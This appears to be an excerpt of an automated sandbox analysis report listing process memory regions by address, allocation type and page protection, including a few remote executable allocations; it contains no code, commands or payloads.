21840000
direct allocation
page read and write
17020E30000
heap
page read and write
181684B0000
heap
page read and write
1816A4C8000
heap
page read and write
7FFD9B77B000
trusted library allocation
page read and write
7F90000
trusted library allocation
page read and write
18168569000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
1816A331000
heap
page read and write
181684FA000
heap
page read and write
4787000
trusted library allocation
page read and write
4E61000
trusted library allocation
page read and write
271D000
stack
page read and write
181686F0000
heap
page read and write
F30000
trusted library allocation
page read and write
21090000
direct allocation
page read and write
1816A4DA000
heap
page read and write
6130000
heap
page readonly
813B000
stack
page read and write
1816A359000
heap
page read and write
73D0000
trusted library allocation
page execute and read and write
7420000
trusted library allocation
page read and write
1816A342000
heap
page read and write
81FA000
heap
page read and write
170228D0000
heap
page read and write
3250000
heap
page read and write
1816A5A5000
heap
page read and write
27E0000
heap
page read and write
1816A518000
heap
page read and write
17020EEA000
heap
page read and write
501C7FF000
stack
page read and write
2D60000
heap
page read and write
3C60000
remote allocation
page execute and read and write
F20000
trusted library allocation
page read and write
1816A375000
heap
page read and write
1816A528000
heap
page read and write
70F0000
heap
page read and write
2194D000
stack
page read and write
1816A4C3000
heap
page read and write
501C0FE000
stack
page read and write
1816A359000
heap
page read and write
6B90000
direct allocation
page read and write
1816A4B0000
heap
page read and write
2155E000
stack
page read and write
1703B039000
heap
page read and write
2524F9C0000
heap
page read and write
7120000
trusted library allocation
page read and write
2524FAE0000
heap
page read and write
3540000
heap
page read and write
17020EB1000
heap
page read and write
6170000
direct allocation
page read and write
1816A4DF000
heap
page read and write
501C3FF000
stack
page read and write
83E0000
trusted library allocation
page read and write
4E49000
trusted library allocation
page read and write
557B63E000
stack
page read and write
1816A4C8000
heap
page read and write
729D000
trusted library allocation
page read and write
17020F70000
heap
page read and write
7128000
trusted library allocation
page read and write
557B2FE000
stack
page read and write
F4A000
trusted library allocation
page execute and read and write
58E3000
trusted library allocation
page read and write
920000
heap
page read and write
7FFD9B820000
trusted library allocation
page execute and read and write
6B60000
direct allocation
page read and write
711A000
heap
page read and write
7EA0000
trusted library allocation
page read and write
21100000
direct allocation
page read and write
1816A335000
heap
page read and write
6ED0000
heap
page read and write
1816A4CD000
heap
page read and write
1816A474000
heap
page read and write
7E90000
trusted library allocation
page read and write
170228C5000
heap
page read and write
1816A49C000
heap
page read and write
8223000
heap
page read and write
18168596000
heap
page read and write
736E000
stack
page read and write
1816A334000
heap
page read and write
CFC000
heap
page read and write
313F000
unkown
page read and write
58DE000
trusted library allocation
page read and write
170249E6000
trusted library allocation
page read and write
1816A480000
heap
page read and write
557C20D000
stack
page read and write
2E70000
heap
page read and write
9752000
direct allocation
page execute and read and write
7045000
heap
page read and write
17020EAD000
heap
page read and write
1816A374000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
210E0000
direct allocation
page read and write
18168725000
heap
page read and write
69AE000
stack
page read and write
5FAB000
heap
page read and write
1703AF03000
heap
page read and write
21470000
heap
page read and write
F98000
heap
page read and write
1816A560000
remote allocation
page read and write
32F8000
heap
page read and write
18168535000
heap
page read and write
5F99000
heap
page read and write
17032A21000
trusted library allocation
page read and write
F10000
trusted library allocation
page read and write
1703B05A000
heap
page read and write
1816A4B7000
heap
page read and write
501C4FF000
stack
page read and write
2159E000
stack
page read and write
1816A331000
heap
page read and write
1816A49C000
heap
page read and write
2DAE000
unkown
page read and write
5F30000
heap
page read and write
1703AFE0000
heap
page execute and read and write
2524FAC0000
heap
page read and write
218BE000
stack
page read and write
1816A47F000
heap
page read and write
181686A0000
heap
page read and write
501C8FF000
stack
page read and write
32F0000
heap
page read and write
2151D000
stack
page read and write
181684D0000
heap
page read and write
21B0B000
stack
page read and write
1816A474000
heap
page read and write
1703AD8E000
heap
page read and write
21E20000
heap
page read and write
1816853C000
heap
page read and write
1816A337000
heap
page read and write
1816855D000
heap
page read and write
1816A4D3000
heap
page read and write
606E000
stack
page read and write
170247F2000
trusted library allocation
page read and write
6B00000
direct allocation
page read and write
2CFD000
stack
page read and write
1816A509000
heap
page read and write
1816A51E000
heap
page read and write
7020000
heap
page read and write
557B73E000
stack
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
181684D8000
heap
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
557B0FE000
stack
page read and write
21B4E000
stack
page read and write
1703AF00000
heap
page read and write
181685C1000
heap
page read and write
1816A359000
heap
page read and write
80FC000
stack
page read and write
7460000
trusted library allocation
page read and write
1816A330000
heap
page read and write
810000
heap
page read and write
17022830000
heap
page read and write
1816A4C3000
heap
page read and write
1816A458000
heap
page read and write
17032A01000
trusted library allocation
page read and write
1816A49C000
heap
page read and write
1816A474000
heap
page read and write
21ACF000
stack
page read and write
81EE000
heap
page read and write
71FFEFF000
unkown
page read and write
6B50000
direct allocation
page read and write
32DF000
stack
page read and write
7FFD9B960000
trusted library allocation
page read and write
817E000
stack
page read and write
1816A5FF000
heap
page read and write
1816A457000
heap
page read and write
569A000
trusted library allocation
page read and write
6B80000
direct allocation
page read and write
1703B0AA000
heap
page read and write
1816A528000
heap
page read and write
1816A4CA000
heap
page read and write
1703AD97000
heap
page read and write
2198C000
stack
page read and write
4620000
heap
page read and write
1816A480000
heap
page read and write
1816A4C8000
heap
page read and write
7400000
trusted library allocation
page read and write
557B17C000
stack
page read and write
353F000
stack
page read and write
17022C25000
trusted library allocation
page read and write
1816A4C8000
heap
page read and write
1816A4CD000
heap
page read and write
17023251000
trusted library allocation
page read and write
6A2E000
stack
page read and write
8400000
trusted library allocation
page read and write
501BD29000
stack
page read and write
7F0E000
stack
page read and write
83C0000
trusted library allocation
page execute and read and write
9A7000
heap
page read and write
329E000
stack
page read and write
7430000
trusted library allocation
page execute and read and write
1816A357000
heap
page read and write
70D3000
heap
page read and write
880000
heap
page read and write
210A0000
direct allocation
page read and write
7410000
trusted library allocation
page read and write
F39000
trusted library allocation
page read and write
557B1FE000
stack
page read and write
17032A10000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
FDE000
stack
page read and write
81FE000
heap
page read and write
1816A52A000
heap
page read and write
7010000
heap
page execute and read and write
1816A344000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
73C0000
trusted library allocation
page read and write
1816A331000
heap
page read and write
1816A4C3000
heap
page read and write
1816A4CD000
heap
page read and write
7F80000
trusted library allocation
page read and write
2954000
heap
page read and write
17020FB0000
trusted library allocation
page read and write
17023211000
trusted library allocation
page read and write
1816A51A000
heap
page read and write
29FD000
stack
page read and write
501C1FE000
stack
page read and write
61A0000
direct allocation
page read and write
1816A4D3000
heap
page read and write
18168548000
heap
page read and write
17032CFB000
trusted library allocation
page read and write
557C18E000
stack
page read and write
F50000
trusted library allocation
page read and write
7F6F000
stack
page read and write
7055000
heap
page read and write
1816A49C000
heap
page read and write
1816A5D0000
heap
page read and write
1816A331000
heap
page read and write
F70000
trusted library allocation
page read and write
1816A4CD000
heap
page read and write
6ECE000
stack
page read and write
4792000
remote allocation
page execute and read and write
83D0000
trusted library allocation
page read and write
3640000
heap
page read and write
1816A4CD000
heap
page read and write
21A4C000
stack
page read and write
7FFD9BA50000
trusted library allocation
page read and write
1703B081000
heap
page read and write
81C0000
heap
page read and write
18168729000
heap
page read and write
1816A49C000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
7280000
trusted library allocation
page read and write
21BCF000
stack
page read and write
1816A357000
heap
page read and write
61B0000
direct allocation
page read and write
73F0000
trusted library allocation
page read and write
4540000
trusted library allocation
page execute and read and write
2930000
heap
page read and write
7F70000
trusted library allocation
page execute and read and write
1703B050000
heap
page read and write
1703AE09000
heap
page read and write
1703ADF0000
heap
page read and write
1816855D000
heap
page read and write
21A0C000
stack
page read and write
1816A4B2000
heap
page read and write
1816A4C3000
heap
page read and write
7F20000
heap
page read and write
1816A4F7000
heap
page read and write
CF0000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1703B010000
heap
page read and write
6B70000
direct allocation
page read and write
AFE000
stack
page read and write
2E7C000
heap
page read and write
17023C5A000
trusted library allocation
page read and write
7FFD9B900000
trusted library allocation
page read and write
1702325A000
trusted library allocation
page read and write
17020FE0000
heap
page readonly
6EE8000
heap
page read and write
6FF0000
heap
page read and write
181685C1000
heap
page read and write
61C0000
heap
page read and write
7141000
heap
page read and write
1816A4B0000
heap
page read and write
5B92000
remote allocation
page execute and read and write
1816A623000
heap
page read and write
9A0000
heap
page read and write
1816A467000
heap
page read and write
17022EAC000
trusted library allocation
page read and write
1816A5D0000
heap
page read and write
557ACD3000
stack
page read and write
1816872C000
heap
page read and write
2524F9CA000
heap
page read and write
2954000
heap
page read and write
71FFB6D000
stack
page read and write
83F0000
trusted library allocation
page read and write
1816A580000
heap
page read and write
1816857B000
heap
page read and write
6AD0000
heap
page execute and read and write
17020EA7000
heap
page read and write
73E0000
trusted library allocation
page read and write
There are 621 hidden memdumps, click here to show them.